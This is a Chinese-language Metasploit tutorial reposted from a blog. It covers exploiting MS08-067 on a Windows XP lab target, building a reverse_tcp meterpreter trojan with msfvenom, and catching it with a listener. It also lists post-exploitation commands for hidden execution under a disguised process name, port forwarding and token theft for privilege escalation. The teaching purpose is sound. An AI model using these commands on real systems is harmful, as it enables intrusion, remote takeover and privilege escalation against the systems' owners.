(msf使用)msfconsole

⭐【msf】 msfconsole meterpreter


对于这款强大渗透测试框架,详情介绍可看这里:metasploit 使用教程


对于msfconsole, Kali Linux 自带。只需用命令行启动便可。


⭐msfconsole 启动不了/初次使用


service postgresql start     # 启动数据库服务
msfdb init             # 初始化数据库
msfconsole             # 启动metasploit

【注】msfconsole 不会就用 msfconsole -h msf5 > help 查看帮助


⭐ms08-067漏洞攻击实践


ifconfig 命令 可 查看kail 系统ip ipconfig 查看 Windows ip

kali: 192.168.xxx.xxx (攻击靶机)


windows xp xxx : 192.168.xxx.xxx (被攻击靶机)


msfconsole - 进入


msfconsole


红框中 标记的是:Metasploit所有的利用模块、payload、post模块等等模块


search - 查看漏洞


search ms08_067


use - 使用漏洞


use exploit/windows/smb/ms08_067_netapi

show - 查看可以攻击的靶机操作系统型号(targets)


show targets

set - 设置target 参数


xx是对应被攻击靶机的型号


set target xx

set - 设置rhost参数


此ip为被攻击靶机的ip地址


set rhost 192.168.xxx.xxx

show - 查看参数


show options


exploit - 进行攻击


exploit


session 查看目前服务器端会话

sessions -i


启动x会话 。

sessions -i x


之后用 meterpreter 命令,转 shell 命令

shell

back - 实现返回


back


查看 payload

show payloads

⭐利用msfvenom生成木马攻击靶场


【参考链接】: i春秋 Meterpreter综合提权


msfvenom 生成 .exe 文件


msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=yyyy -f exe -o /tmp/muma.exe
windows/meterpreter/reverse_tcp : payload
lhost :木马反弹到的监听端地址=192.168.xxx.xxx
lport :监听端口=yyyy

常见 msfvenom 命令参数如下:


-p 选择一个载荷(payload)


-l 载荷列表


-f 生成的文件格式


-e 编码方式


-i 编码次数


-b 在生成的程序中避免出现的值


-h 帮助


用msfconsole监听


选用 exploit/multi/handler 监听模块


use exploit/multi/handler

设置payload:


set payload windows/x64/meterpreter/reverse_tcp

设置 监听ip地址以及监听端口:


set lhost 192.168.xxx.xxx

set lport yyyy

查看设置参数:


show options

开启配置模块进行监听


exploit



⭐Meterpreter


Meterpreter命令详解


常见命令


upload - 上传文件


上传1.txt到目标靶机c:muma下


upload 1.txt c:\muma\


download - 下载目标靶机相对应权限的任意路径下的文件


命令 download file path


download c:\muma\1.txt

sysinfo 命令:


显示远程主机的系统信息,显示计算机、系统信息、结构、语言等信息。


运行目标主机上的cmd.exe程序,以隐藏的方式直接交互到meterpreter会话上


execute  -H -i -f cmd.exe

execute  -H -m -d notepad.exe-f  muma.exe -a "-o muma.txt"

-d 在目标主机执行时显示的进程名称(用以伪装)

-m 直接从内存中执行

"-o muma.txt"是muma.exe的运行参数

网络命令


portfwd 命令:


portfwd add -l yyyy -p zzzz -r 192.168.xxx.xxx # 端口转发,本机监听yyyy,把目标机zzzz转到本机yyyy

netstat -an | grep"yyyy" #查看指定端口开放情况

基础提权


getsystem


利用 ps 命令查看目标靶机当前进程


找到管理员相应PID。若PID:xxxx


steal_token xxxx
#盗取guanliyuan
getuid
#检查是否成功
shell

【侵权删】


【转载请放链接】 https://www.cnblogs.com/Jlay/p/msf.html

原文地址:https://www.cnblogs.com/Jlay/p/msf.html